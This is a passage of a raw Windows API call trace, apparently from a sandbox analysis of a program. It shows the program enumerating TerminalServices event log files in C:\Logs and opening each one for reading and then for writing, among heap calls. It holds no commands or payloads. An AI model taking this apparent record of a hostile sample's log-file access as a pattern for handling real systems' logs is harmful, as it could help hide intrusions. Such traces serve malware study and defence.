Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.622] AreFileApisANSI () returned 1 [0072.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0072.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0072.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 81 [0072.623] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.623] GetFileType (hFile=0x418) returned 0x1 [0072.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0072.623] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.623] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.623] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.623] CloseHandle (hObject=0x418) returned 1 [0072.623] AreFileApisANSI () returned 1 [0072.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f798 [0072.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 81 [0072.624] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.624] GetFileType (hFile=0x418) returned 0x1 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0072.624] CloseHandle (hObject=0x418) returned 1 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.625] AreFileApisANSI () returned 1 [0072.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x603f8 [0072.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x603f8, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 81 [0072.625] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.625] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0072.626] AreFileApisANSI () returned 1 [0072.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 79 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0072.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.626] AreFileApisANSI () returned 1 [0072.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0072.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x30c98 [0072.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=79 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 79 [0072.627] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.628] GetFileType (hFile=0x418) returned 0x1 [0072.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.628] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.628] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.629] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.629] CloseHandle (hObject=0x418) returned 1 [0072.629] AreFileApisANSI () returned 1 [0072.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0072.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x30c98 [0072.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=79 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 79 [0072.629] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.629] GetFileType (hFile=0x418) returned 0x1 [0072.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.629] CloseHandle (hObject=0x418) returned 1 [0072.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0072.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0072.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0072.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0072.630] AreFileApisANSI () returned 1 [0072.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x30c98 [0072.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x30c98, cchWideChar=79 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 79 [0072.630] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0072.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.630] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0072.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0072.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0072.631] AreFileApisANSI () returned 1 [0072.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 85 [0072.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0072.632] AreFileApisANSI () returned 1 [0072.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0072.632] 